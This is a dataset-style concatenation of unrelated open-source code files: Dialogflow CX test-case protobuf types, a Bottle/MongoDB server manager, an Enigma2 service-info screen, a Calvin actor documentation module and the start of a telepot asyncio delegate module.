[TestCases.BatchRunTestCases][google.cloud.dialogflow.cx.v3.TestCases.BatchRunTestCases].
Attributes:
results (Sequence[google.cloud.dialogflowcx_v3.types.TestCaseResult]):
The test case results. The detailed [conversation
turns][google.cloud.dialogflow.cx.v3.TestCaseResult.conversation_turns]
are empty in this response.
"""
results = proto.RepeatedField(proto.MESSAGE, number=1, message="TestCaseResult",)
class BatchRunTestCasesMetadata(proto.Message):
r"""Metadata returned for the
[TestCases.BatchRunTestCases][google.cloud.dialogflow.cx.v3.TestCases.BatchRunTestCases]
long running operation.
Attributes:
errors (Sequence[google.cloud.dialogflowcx_v3.types.TestError]):
The test errors.
"""
errors = proto.RepeatedField(proto.MESSAGE, number=1, message="TestError",)
class TestError(proto.Message):
r"""Error info for running a test.
Attributes:
test_case (str):
The test case resource name.
status (google.rpc.status_pb2.Status):
The status associated with the test.
test_time (google.protobuf.timestamp_pb2.Timestamp):
The timestamp when the test was completed.
"""
test_case = proto.Field(proto.STRING, number=1,)
status = proto.Field(proto.MESSAGE, number=2, message=status_pb2.Status,)
test_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
class ImportTestCasesRequest(proto.Message):
r"""The request message for
[TestCases.ImportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ImportTestCases].
Attributes:
parent (str):
Required. The agent to import test cases to. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
gcs_uri (str):
The `Google Cloud
Storage <https://cloud.google.com/storage/docs/>`__ URI to
import test cases from. The format of this URI must be
``gs://<bucket-name>/<object-name>``.
content (bytes):
Uncompressed raw byte content for test cases.
"""
parent = proto.Field(proto.STRING, number=1,)
gcs_uri = proto.Field(proto.STRING, number=2, oneof="source",)
content = proto.Field(proto.BYTES, number=3, oneof="source",)
class ImportTestCasesResponse(proto.Message):
r"""The response message for
[TestCases.ImportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ImportTestCases].
Attributes:
names (Sequence[str]):
The unique identifiers of the new test cases. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/testCases/<TestCase ID>``.
"""
names = proto.RepeatedField(proto.STRING, number=1,)
class ImportTestCasesMetadata(proto.Message):
r"""Metadata returned for the
[TestCases.ImportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ImportTestCases]
long running operation.
Attributes:
errors (Sequence[google.cloud.dialogflowcx_v3.types.TestCaseError]):
Errors for failed test cases.
"""
errors = proto.RepeatedField(proto.MESSAGE, number=1, message="TestCaseError",)
class TestCaseError(proto.Message):
r"""Error info for importing a test.
Attributes:
test_case (google.cloud.dialogflowcx_v3.types.TestCase):
The test case.
status (google.rpc.status_pb2.Status):
The status associated with the test case.
"""
test_case = proto.Field(proto.MESSAGE, number=1, message="TestCase",)
status = proto.Field(proto.MESSAGE, number=2, message=status_pb2.Status,)
class ExportTestCasesRequest(proto.Message):
r"""The request message for
[TestCases.ExportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ExportTestCases].
Attributes:
parent (str):
Required. The agent where to export test cases from. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
gcs_uri (str):
The `Google Cloud
Storage <https://cloud.google.com/storage/docs/>`__ URI to
export the test cases to. The format of this URI must be
``gs://<bucket-name>/<object-name>``. If unspecified, the
serialized test cases is returned inline.
data_format (google.cloud.dialogflowcx_v3.types.ExportTestCasesRequest.DataFormat):
The data format of the exported test cases. If not
specified, ``BLOB`` is assumed.
filter (str):
The filter expression used to filter exported test cases,
see `API Filtering <https://aip.dev/160>`__. The expression
is case insensitive and supports the following syntax:
name = [OR name = ] ...
For example:
- "name = t1 OR name = t2" matches the test case with the
exact resource name "t1" or "t2".
"""
class DataFormat(proto.Enum):
r"""Data format of the exported test cases."""
DATA_FORMAT_UNSPECIFIED = 0
BLOB = 1
JSON = 2
parent = proto.Field(proto.STRING, number=1,)
gcs_uri = proto.Field(proto.STRING, number=2, oneof="destination",)
data_format = proto.Field(proto.ENUM, number=3, enum=DataFormat,)
filter = proto.Field(proto.STRING, number=4,)
class ExportTestCasesResponse(proto.Message):
r"""The response message for
[TestCases.ExportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ExportTestCases].
Attributes:
gcs_uri (str):
The URI to a file containing the exported test cases. This
field is populated only if ``gcs_uri`` is specified in
[ExportTestCasesRequest][google.cloud.dialogflow.cx.v3.ExportTestCasesRequest].
content (bytes):
Uncompressed raw byte content for test cases.
"""
gcs_uri = proto.Field(proto.STRING, number=1, oneof="destination",)
content = proto.Field(proto.BYTES, number=2, oneof="destination",)
class ExportTestCasesMetadata(proto.Message):
r"""Metadata returned for the
[TestCases.ExportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ExportTestCases]
long running operation.
"""
class ListTestCaseResultsRequest(proto.Message):
r"""The request message for
[TestCases.ListTestCaseResults][google.cloud.dialogflow.cx.v3.TestCases.ListTestCaseResults].
Attributes:
parent (str):
Required. The test case to list results for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/ testCases/<TestCase ID>``.
Specify a ``-`` as a wildcard for TestCase ID to list
results across multiple test cases.
page_size (int):
The maximum number of items to return in a
single page. By default 100 and at most 1000.
page_token (str):
The next_page_token value returned from a previous list
request.
filter (str):
The filter expression used to filter test case results. See
`API Filtering <https://aip.dev/160>`__.
The expression is case insensitive. Only 'AND' is supported
for logical operators. The supported syntax is listed below
in detail:
[AND ] ... [AND latest]
The supported fields and operators are: field operator
``environment`` ``=``, ``IN`` (Use value ``draft`` for draft
environment) ``test_time`` ``>``, ``<``
``latest`` only returns the latest test result in all
results for each test case.
Examples:
- "environment=draft AND latest" matches the latest test
result for each test case in the draft environment.
- "environment IN (e1,e2)" matches any test case results
with an environment resource name of either "e1" or "e2".
- "test_time > 1602540713" matches any test case results
with test time later than a unix timestamp in seconds
1602540713.
"""
parent = proto.Field(proto.STRING, number=1,)
page_size = proto.Field(proto.INT32, number=2,)
page_token = proto.Field(proto.STRING, number=3,)
filter = proto.Field(proto.STRING, number=4,)
class ListTestCaseResultsResponse(proto.Message):
r"""The response message for
[TestCases.ListTestCaseResults][google.cloud.dialogflow.cx.v3.TestCases.ListTestCaseResults].
Attributes:
test_case_results (Sequence[google.cloud.dialogflowcx_v3.types.TestCaseResult]):
The list of test case results.
next_page_token (str):
Token to retrieve the next page of results,
or empty if there are no more results in the
list.
"""
@property
def raw_page(self):
return self
test_case_results = proto.RepeatedField(
proto.MESSAGE, number=1, message="TestCaseResult",
)
next_page_token = proto.Field(proto.STRING, number=2,)
class GetTestCaseResultRequest(proto.Message):
r"""The request message for
[TestCases.GetTestCaseResult][google.cloud.dialogflow.cx.v3.TestCases.GetTestCaseResult].
Attributes:
name (str):
Required. The name of the testcase. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/testCases/<TestCase ID>/results/<TestCaseResult ID>``.
"""
name = proto.Field(proto.STRING, number=1,)
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | -4,764,152,843,310,071,000 | 38.157173 | 133 | 0.648312 | false |
Statik-Metrics/Statik-API | internal/manager.py | 1 | 3022 | __author__ = 'Gareth Coles'
import logging
import os
import yaml
from bottle import run, default_app, request, hook
from internal.api import ApiManager
from internal.db import Db
from internal.highlight import Highlight
from internal.schemas import schemas
from internal.singleton import Singleton
from internal.util import log_request, log
class Manager(object, metaclass=Singleton):
db = {}
mongo_conf = None
mongo = None
def __init__(self):
self.apis = ApiManager()
self.highlight = Highlight()
self.app = default_app()
self.mongo_conf = os.environ.get("MONGOHQ_URL", None)
if not self.mongo_conf:
self.db = yaml.load(open("config/database.yml", "r"))
self.mongo_conf = self.db["mongo"]
self.setup_mongo()
self.routes = {}
def setup_routes(self):
files = os.listdir("routes")
files.remove("__init__.py")
for _file in files:
if _file.endswith(".py"):
module = _file.rsplit(".", 1)[0]
try:
log(
"Loading routes module '{0}'".format(module),
logging.INFO
)
mod = __import__(
"routes.{0}".format(module),
fromlist=["Routes"]
)
self.routes[module] = mod.Routes(self.app, self)
except Exception as e:
log(
"Error loading routes module '{0}': {1}"
.format(module, e)
)
raise
log("{0} routes set up.".format(len(self.app.routes)))
def get_app(self):
return self.app
def setup_mongo(self):
try:
self.mongo = Db(self.mongo_conf)
self.mongo.setup()
for key in schemas.keys():
log("Adding schema for collection: {0}".format(key))
self.mongo.add_schema(key, schemas[key])
self.mongo.client.admin.command("ping")
log("Set up Mongo successfully.")
except Exception as e:
log("Unable to set up Mongo: {0}".format(e), logging.ERROR)
def start(self):
def log_all():
log_request(
request,
"{0} {1} ".format(request.method, request.fullpath)
)
hook('after_request')(log_all)
try:
config = yaml.load(open("config/development.yml", "r"))
host = config.get("host", "127.0.0.1")
port = config.get("port", 8080)
server = config.get("server", "cherrypy")
except Exception as e:
log("Unable to load development config: {0}".format(e))
log("Continuing using the defaults.")
host = "127.0.0.1"
port = 8080
server = "cherrypy"
run(app=self.get_app(), host=host, port=port, server=server)
| artistic-2.0 | -2,538,337,149,603,165,700 | 28.920792 | 71 | 0.510258 | false |
eesatfan/vuplus-enigma2 | lib/python/Screens/ServiceInfo.py | 1 | 9869 | from Components.HTMLComponent import HTMLComponent
from Components.GUIComponent import GUIComponent
from Screen import Screen
from Components.ActionMap import ActionMap
from Components.Label import Label
from ServiceReference import ServiceReference
from enigma import eListboxPythonMultiContent, eListbox, gFont, iServiceInformation, eServiceCenter
from Tools.Transponder import ConvertToHumanReadable
RT_HALIGN_LEFT = 0
TYPE_TEXT = 0
TYPE_VALUE_HEX = 1
TYPE_VALUE_DEC = 2
TYPE_VALUE_HEX_DEC = 3
TYPE_SLIDER = 4
def to_unsigned(x):
return x & 0xFFFFFFFF
def ServiceInfoListEntry(a, b, valueType=TYPE_TEXT, param=4):
print "b:", b
if not isinstance(b, str):
if valueType == TYPE_VALUE_HEX:
b = ("0x%0" + str(param) + "x") % to_unsigned(b)
elif valueType == TYPE_VALUE_DEC:
b = str(b)
elif valueType == TYPE_VALUE_HEX_DEC:
b = ("0x%0" + str(param) + "x (%dd)") % (to_unsigned(b), b)
else:
b = str(b)
return [
#PyObject *type, *px, *py, *pwidth, *pheight, *pfnt, *pstring, *pflags;
(eListboxPythonMultiContent.TYPE_TEXT, 0, 0, 200, 30, 0, RT_HALIGN_LEFT, ""),
(eListboxPythonMultiContent.TYPE_TEXT, 0, 0, 200, 25, 0, RT_HALIGN_LEFT, a),
(eListboxPythonMultiContent.TYPE_TEXT, 220, 0, 350, 25, 0, RT_HALIGN_LEFT, b)
]
class ServiceInfoList(HTMLComponent, GUIComponent):
def __init__(self, source):
GUIComponent.__init__(self)
self.l = eListboxPythonMultiContent()
self.list = source
self.l.setList(self.list)
self.l.setFont(0, gFont("Regular", 23))
self.l.setItemHeight(25)
GUI_WIDGET = eListbox
def postWidgetCreate(self, instance):
self.instance.setContent(self.l)
TYPE_SERVICE_INFO = 1
TYPE_TRANSPONDER_INFO = 2
class ServiceInfo(Screen):
def __init__(self, session, serviceref=None):
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions"],
{
"ok": self.close,
"cancel": self.close,
"red": self.information,
"green": self.pids,
"yellow": self.transponder,
"blue": self.tuner
}, -1)
if serviceref:
self.type = TYPE_TRANSPONDER_INFO
self["red"] = Label()
self["green"] = Label()
self["yellow"] = Label()
self["blue"] = Label()
info = eServiceCenter.getInstance().info(serviceref)
self.transponder_info = info.getInfoObject(serviceref, iServiceInformation.sTransponderData)
# info is a iStaticServiceInformation, not a iServiceInformation
self.info = None
self.feinfo = None
else:
self.type = TYPE_SERVICE_INFO
self["red"] = Label(_("Service"))
self["green"] = Label(_("PIDs"))
self["yellow"] = Label(_("Multiplex"))
self["blue"] = Label(_("Tuner status"))
service = session.nav.getCurrentService()
if service is not None:
self.info = service.info()
self.feinfo = service.frontendInfo()
print self.info.getInfoObject(iServiceInformation.sCAIDs);
else:
self.info = None
self.feinfo = None
tlist = [ ]
self["infolist"] = ServiceInfoList(tlist)
self.onShown.append(self.information)
def information(self):
if self.type == TYPE_SERVICE_INFO:
if self.session.nav.getCurrentlyPlayingServiceReference():
name = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getServiceName()
refstr = self.session.nav.getCurrentlyPlayingServiceReference().toString()
else:
name = _("N/A")
refstr = _("N/A")
aspect = self.getServiceInfoValue(iServiceInformation.sAspect)
if aspect in ( 1, 2, 5, 6, 9, 0xA, 0xD, 0xE ):
aspect = _("4:3")
else:
aspect = _("16:9")
width = self.info and self.info.getInfo(iServiceInformation.sVideoWidth) or -1
height = self.info and self.info.getInfo(iServiceInformation.sVideoHeight) or -1
if width != -1 and height != -1:
Labels = ( (_("Name"), name, TYPE_TEXT),
(_("Provider"), self.getServiceInfoValue(iServiceInformation.sProvider), TYPE_TEXT),
(_("Aspect ratio"), aspect, TYPE_TEXT),
(_("Resolution"), "%dx%d" %(width, height), TYPE_TEXT),
(_("Namespace"), self.getServiceInfoValue(iServiceInformation.sNamespace), TYPE_VALUE_HEX, 8),
(_("Service reference"), refstr, TYPE_TEXT))
else:
Labels = ( (_("Name"), name, TYPE_TEXT),
(_("Provider"), self.getServiceInfoValue(iServiceInformation.sProvider), TYPE_TEXT),
(_("Aspect ratio"), aspect, TYPE_TEXT),
(_("Namespace"), self.getServiceInfoValue(iServiceInformation.sNamespace), TYPE_VALUE_HEX, 8),
(_("Service reference"), refstr, TYPE_TEXT))
self.fillList(Labels)
else:
if self.transponder_info:
tp_info = ConvertToHumanReadable(self.transponder_info)
conv = { "tuner_type" : _("Type"),
"system" : _("System"),
"modulation" : _("Modulation"),
"orbital_position" : _("Orbital position"),
"frequency" : _("Frequency"),
"symbol_rate" : _("Symbol rate"),
"bandwidth" : _("Bandwidth"),
"polarization" : _("Polarization"),
"inversion" : _("Inversion"),
"pilot" : _("Pilot"),
"rolloff" : _("Roll-off"),
"fec_inner" : _("FEC"),
"code_rate_lp" : _("Code rate LP"),
"code_rate_hp" : _("Code rate HP"),
"constellation" : _("Constellation"),
"transmission_mode" : _("Transmission mode"),
"guard_interval" : _("Guard interval"),
"hierarchy_information" : _("Hierarchy info") }
Labels = [(conv[i], tp_info[i], TYPE_VALUE_DEC) for i in tp_info.keys()]
self.fillList(Labels)
def pids(self):
if self.type == TYPE_SERVICE_INFO:
Labels = ( (_("Video PID"), self.getServiceInfoValue(iServiceInformation.sVideoPID), TYPE_VALUE_HEX_DEC, 4),
(_("Audio PID"), self.getServiceInfoValue(iServiceInformation.sAudioPID), TYPE_VALUE_HEX_DEC, 4),
(_("PCR PID"), self.getServiceInfoValue(iServiceInformation.sPCRPID), TYPE_VALUE_HEX_DEC, 4),
(_("PMT PID"), self.getServiceInfoValue(iServiceInformation.sPMTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TXT PID"), self.getServiceInfoValue(iServiceInformation.sTXTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TSID"), self.getServiceInfoValue(iServiceInformation.sTSID), TYPE_VALUE_HEX_DEC, 4),
(_("ONID"), self.getServiceInfoValue(iServiceInformation.sONID), TYPE_VALUE_HEX_DEC, 4),
(_("SID"), self.getServiceInfoValue(iServiceInformation.sSID), TYPE_VALUE_HEX_DEC, 4))
self.fillList(Labels)
def showFrontendData(self, real):
if self.type == TYPE_SERVICE_INFO:
frontendData = self.feinfo and self.feinfo.getAll(real)
Labels = self.getFEData(frontendData)
self.fillList(Labels)
def transponder(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(True)
def tuner(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(False)
def getFEData(self, frontendDataOrg):
if frontendDataOrg and len(frontendDataOrg):
frontendData = ConvertToHumanReadable(frontendDataOrg)
if frontendDataOrg["tuner_type"] == "DVB-S":
return ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("System"), frontendData["system"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Orbital position"), frontendData["orbital_position"], TYPE_VALUE_DEC),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Polarization"), frontendData["polarization"], TYPE_TEXT),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT),
(_("Pilot"), frontendData.get("pilot", None), TYPE_TEXT),
(_("Roll-off"), frontendData.get("rolloff", None), TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-C":
return ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-T":
data = ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("System"), frontendData["system"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("Bandwidth"), frontendData["bandwidth"], TYPE_VALUE_DEC),
(_("Code rate LP"), frontendData["code_rate_lp"], TYPE_TEXT),
(_("Code rate HP"), frontendData["code_rate_hp"], TYPE_TEXT),
(_("Constellation"), frontendData["constellation"], TYPE_TEXT),
(_("Transmission mode"), frontendData["transmission_mode"], TYPE_TEXT),
(_("Guard interval"), frontendData["guard_interval"], TYPE_TEXT),
(_("Hierarchy info"), frontendData["hierarchy_information"], TYPE_TEXT))
if frontendData.has_key("plp_id"):
data += ((_("PLP ID"), frontendData["plp_id"], TYPE_VALUE_DEC), )
return data
return [ ]
def fillList(self, Labels):
tlist = [ ]
for item in Labels:
if item[1] is None:
continue;
value = item[1]
if len(item) < 4:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2]))
else:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2], item[3]))
self["infolist"].l.setList(tlist)
def getServiceInfoValue(self, what):
if self.info is None:
return ""
v = self.info.getInfo(what)
if v == -2:
v = self.info.getInfoString(what)
elif v == -1:
v = _("N/A")
return v
| gpl-2.0 | -2,097,492,960,710,691,000 | 38.794355 | 111 | 0.644544 | false |
EricssonResearch/calvin-base | calvin/actorstore/docobject.py | 1 | 12850 | import json
import inspect
import pystache
from calvin.utilities.calvinlogger import get_logger
_log = get_logger(__name__)
class DocObject(object):
"""docstring for DocObject"""
use_links = False
COMPACT_FMT = "{{{qualified_name}}} : {{{short_desc}}}"
DETAILED_FMT_MD = "{{{e_qualified_name}}} : {{{e_short_desc}}}"
DETAILED_FMT_PLAIN = COMPACT_FMT
def __init__(self, namespace, name=None, docs=None):
super(DocObject, self).__init__()
self.ns = namespace
self.name = name
if type(docs) is list:
docs = "\n".join(docs)
self.label = "DocObject"
self.docs = docs.rstrip() or ""
#
# Allow templates to use e_attr to access an escaped version of attribute attr
#
def __getattr__(self, synthetic_attr):
if not synthetic_attr.startswith('e_'):
raise AttributeError("No such attribute: %s" % synthetic_attr)
_, attr = synthetic_attr.split('_', 1)
if not hasattr(self, attr):
raise AttributeError("No such attribute: %s" % attr)
x = getattr(self, attr)
# N.B. Kind of escape should depend on desired output
return self._escape_text(x)
def _escape_text(self, txt):
def _escape_line(line):
if line.startswith(' '):
return line
for c in "\\<>*_{}[]()#+-.!":
line = line.replace(c, "\\"+c)
return line
lines_in = txt.split('\n')
lines_out = [_escape_line(line) for line in lines_in]
return "\n".join(lines_out)
@property
def has_actors(self):
return False
@property
def has_modules(self):
return False
@property
def qualified_name(self):
if self.name:
return "{}.{}".format(self.ns, self.name)
return self.ns
@property
def own_name(self):
return self.name or self.ns
@property
def short_desc(self):
short_desc, _, _ = self.docs.partition('\n')
return short_desc
@property
def slug(self):
return self.qualified_name.replace('.', '_')
#
# "API" to produce output from a DocObject
#
def compact(self):
fmt = inspect.cleandoc(self.COMPACT_FMT)
return pystache.render(fmt, self)
def detailed(self):
fmt = inspect.cleandoc(self.DETAILED_FMT_PLAIN)
return pystache.render(fmt, self)
def markdown(self):
DocObject.use_links = False
fmt = inspect.cleandoc(self.DETAILED_FMT_MD)
return pystache.render(fmt, self)
def markdown_links(self):
DocObject.use_links = True
fmt = inspect.cleandoc(self.DETAILED_FMT_MD)
return pystache.render(fmt, self)
def metadata(self):
return {'is_known': False}
def __repr__(self):
def _convert(x):
try:
return x.name or x.ns
except:
return None
r = {'type':str(self.__class__.__name__)}
r.update(self.__dict__)
return json.dumps(r, default=_convert)
class ErrorDoc(DocObject):
"""docstring for ErrDoc"""
COMPACT_FMT = "({{{label}}}) {{{qualified_name}}} : {{{short_desc}}}"
DETAILED_FMT_MD = "({{{label}}}) {{{e_qualified_name}}} : {{{e_short_desc}}}"
DETAILED_FMT_PLAIN = COMPACT_FMT
def __init__(self, namespace, name, short_desc):
docs = short_desc or "Unknown error"
super(ErrorDoc, self).__init__(namespace, name, docs)
self.label = "Error"
def search(self, search_list):
_log.debug("Actor module {}/ is missing file __init__.py".format(self.ns))
return self
class ModuleDoc(DocObject):
"""docstring for ModuleDoc"""
COMPACT_FMT = """
{{{qualified_name}}}
{{{short_desc}}}
{{#modules_compact}}
Modules: {{{modules_compact}}}
{{/modules_compact}}
{{#actors_compact}}
Actors: {{{actors_compact}}}
{{/actors_compact}}
"""
DETAILED_FMT_PLAIN = """
============================================================
{{{label}}}: {{{qualified_name}}}
============================================================
{{{docs}}}
{{#has_modules}}
Modules:
{{/has_modules}}
{{#modules}}
{{{own_name}}} : {{{short_desc}}}
{{/modules}}
{{#has_actors}}
Actors:
{{/has_actors}}
{{#actors}}
{{{own_name}}} : {{{short_desc}}}
{{/actors}}
"""
DETAILED_FMT_MD = """
## {{{label}}}: {{{e_qualified_name}}} {{#use_links}}<a name="{{{slug}}}"></a>{{/use_links}}
{{{e_docs}}}
{{#has_modules}}
### Modules:
{{/has_modules}}
{{#modules}}
{{#use_links}}[**{{{e_own_name}}}**](#{{{slug}}}){{/use_links}}{{^use_links}}**{{{e_own_name}}}**{{/use_links}} : {{{e_short_desc}}}
{{/modules}}
{{#has_actors}}
### Actors:
{{/has_actors}}
{{#actors}}
{{#use_links}}[**{{{e_own_name}}}**](#{{{slug}}}){{/use_links}}{{^use_links}}**{{{e_own_name}}}**{{/use_links}} : {{{e_short_desc}}}
{{/actors}}
{{#use_links}}[\[Top\]](#Calvin){{/use_links}}
***
"""
def __init__(self, namespace, modules, actors, doclines):
super(ModuleDoc, self).__init__(namespace, None, doclines)
self.modules = modules
self.actors = actors
self.label = "Module"
@property
def has_actors(self):
return bool(self.actors)
@property
def has_modules(self):
return bool(self.modules)
@property
def modules_compact(self):
return ", ".join([x.own_name for x in self.modules if type(x) is not ErrorDoc])
@property
def actors_compact(self):
return ", ".join([x.own_name for x in self.actors if type(x) is not ErrorDoc])
def search(self, search_list):
if not search_list:
return self
name = search_list.pop(0)
for x in self.modules:
if name == x.ns:
return x.search(search_list)
for x in self.actors:
if name == x.name:
if not search_list:
return x
return None # Error
return None
def metadata(self):
metadata = super(ModuleDoc, self).metadata()
metadata['modules'] = [x.ns for x in self.modules]
metadata['actors'] = [x.name for x in self.actors]
return metadata
class ActorDoc(DocObject):
"""docstring for ActorDoc"""
COMPACT_FMT = """
{{{qualified_name}}}({{{fargs}}})
{{{short_desc}}}
{{#has_inports}}Inports: {{{inports_compact}}}{{/has_inports}}
{{#has_outports}}Outports: {{{outports_compact}}}{{/has_outports}}
{{#has_requirements}}Requires: {{{requires_compact}}}{{/has_requirements}}
"""
DETAILED_FMT_PLAIN = """
============================================================
{{{label}}}: {{{qualified_name}}}({{{fargs}}})
============================================================
{{{docs}}}
{{#has_inports}}
Inports:
{{/has_inports}}
{{#inports}}
{{{name}}} : {{{docs}}} {{#props}}Properties({{{props}}}){{/props}}
{{/inports}}
{{#has_outports}}
Outports:
{{/has_outports}}
{{#outports}}
{{{name}}} : {{{docs}}} {{#props}}Properties({{{props}}}){{/props}}
{{/outports}}
{{#has_requirements}}
Requires:
{{{requires_compact}}}
{{/has_requirements}}
"""
DETAILED_FMT_MD = """
## {{{label}}}: {{{e_qualified_name}}}({{{e_fargs}}}) {{#use_links}}<a name="{{{slug}}}"></a>{{/use_links}}
{{{e_docs}}}
{{#has_inports}}
### Inports:
{{/has_inports}}
{{#inports}}
**{{{e_name}}}** : {{{e_docs}}} {{#props}}_Properties({{{e_props}}})_{{/props}}
{{/inports}}
{{#has_outports}}
### Outports:
{{/has_outports}}
{{#outports}}
**{{{e_name}}}** : {{{e_docs}}} {{#props}}_Properties({{{e_props}}})_{{/props}}
{{/outports}}
{{#has_requirements}}
### Requires:
{{{e_requires_compact}}}
{{/has_requirements}}
{{#use_links}}[\[Top\]](#Calvin) [\[Module: {{{e_ns}}}\]](#{{{ns}}}){{/use_links}}
***
"""
def __init__(self, namespace, name, args, inputs, outputs, doclines, requires):
super(ActorDoc, self).__init__(namespace, name, doclines)
self.args = args
self.inports = [PortDoc(namespace='in', name=pn, docs=pd, properties=pp) for pn, pd, pp in inputs]
self.outports = [PortDoc(namespace='out', name=pn, docs=pd, properties=pp) for pn, pd, pp in outputs]
self.input_properties = {pn:pp for pn, _, pp in inputs}
self.output_properties = {pn:pp for pn, _, pp in outputs}
self.inputs = [pn for pn, _, _ in inputs]
self.outputs = [pn for pn, _, _ in outputs]
self.requires = sorted(requires)
self.label = "Actor"
@property
def has_inports(self):
return bool(self.inports)
@property
def has_outports(self):
return bool(self.outports)
@property
def has_requirements(self):
return bool(self.requires)
@property
def fargs(self):
def _escape_string_arg(arg):
if type(arg) == str or type(arg) == unicode:
# Handle \n, \r etc
return '"{}"'.format(arg).encode('string_escape')
if arg is True:
return 'true'
if arg is False:
return 'false'
if arg is None:
return 'null'
return arg
# return '"{}"'.format(arg)
return ", ".join(self.args['mandatory'] + ["{}={}".format(k, _escape_string_arg(v)) for k,v in self.args['optional'].iteritems()])
@property
def inports_compact(self):
return ", ".join(self.inputs)
@property
def outports_compact(self):
return ", ".join(self.outputs)
@property
def requires_compact(self):
return ", ".join(self.requires)
def metadata(self):
metadata = {
'ns': self.ns,
'name': self.name,
'type': 'actor',
'args': self.args,
'inputs': self.inputs,
'input_properties': self.input_properties,
'outputs': self.outputs,
'output_properties': self.output_properties,
'requires': self.requires,
'is_known': True
}
return metadata
class PortDoc(DocObject):
def __init__(self, namespace, name, docs, properties):
super(PortDoc, self).__init__(namespace, name, docs)
self.properties = properties;
@property
def props(self):
def _fmt_val(v):
if type(v) is not list:
return str(v)
l = ", ".join(v)
return "[{}]".format(l) if l else ""
res = ", ".join(["{}:{}".format(k, _fmt_val(v)) for k,v in self.properties.iteritems()])
return res
class ComponentDoc(ActorDoc):
#
# Augment a couple of methods in the superclass
#
def __init__(self, namespace, name, args, inputs, outputs, doclines, definition):
# FIXME: Build requirements by recursing definition
requires = []
super(ComponentDoc, self).__init__(namespace, name, args, inputs, outputs, doclines, requires)
self.definition = definition
self.label = "Component"
def metadata(self):
metadata = super(ComponentDoc, self).metadata()
metadata['type'] = 'component'
metadata['definition'] = self.definition
return metadata
if __name__ == '__main__':
def test_all_formatters(d):
print "\n%s\n=======================" % (d.__class__.__name__,)
for formatter in [d.compact, d.detailed, d.markdown, d.markdown_links]:
print "%s:\n-----------------------" % (formatter.__name__,)
print formatter()
# d = DocObject('yadda')
# test_all_formatters(d)
# d = ErrorDoc('foo', 'Bar', 'short error description')
# test_all_formatters(d)
# #
# d = ModuleDoc('root', [ModuleDoc('std', [], [], 'std short description'), ModuleDoc('io', [], [], 'io short description')], [], 'short description')
# test_all_formatters(d)
#
doclines = """actor yaddda, yadda
Even more
"""
a = ActorDoc('std', 'Comp', {'mandatory':['x', 'y'], 'optional':{'z':1}}, [('in1', 'anything', 'property'), ('in2', 'something', 'property')], [('out', 'token', {'foo':['apa', 'banan']})], doclines)
test_all_formatters(a)
# c = ComponentDoc('std', 'Args', {'mandatory':['x', 'y'], 'optional':{'z':1}}, [('in1', 'anything', 'property'), ('in2', 'something', 'property')], [('out', 'token', 'property')], doclines, ['alpha', 'beta'], {})
# test_all_formatters(c)
#
# d = ModuleDoc('std', [], [a, c], 'short description')
# test_all_formatters(d)
| apache-2.0 | 6,147,491,349,579,409,000 | 28.072398 | 217 | 0.524358 | false |
mpunkenhofer/irc-telegram-bot | telepot/telepot/aio/delegate.py | 1 | 3780 | """
Like :mod:`telepot.delegate`, this module has a bunch of seeder factories
and delegator factories.
.. autofunction:: per_chat_id
.. autofunction:: per_chat_id_in
.. autofunction:: per_chat_id_except
.. autofunction:: per_from_id
.. autofunction:: per_from_id_in
.. autofunction:: per_from_id_except
.. autofunction:: per_inline_from_id
.. autofunction:: per_inline_from_id_in
.. autofunction:: per_inline_from_id_except
.. autofunction:: per_application
.. autofunction:: per_message
.. autofunction:: per_event_source_id
.. autofunction:: per_callback_query_chat_id
.. autofunction:: per_callback_query_origin
.. autofunction:: until
.. autofunction:: chain
.. autofunction:: pair
.. autofunction:: pave_event_space
.. autofunction:: include_callback_query_chat_id
.. autofunction:: intercept_callback_query_origin
"""
import asyncio
import traceback
from .. import exception
from . import helper
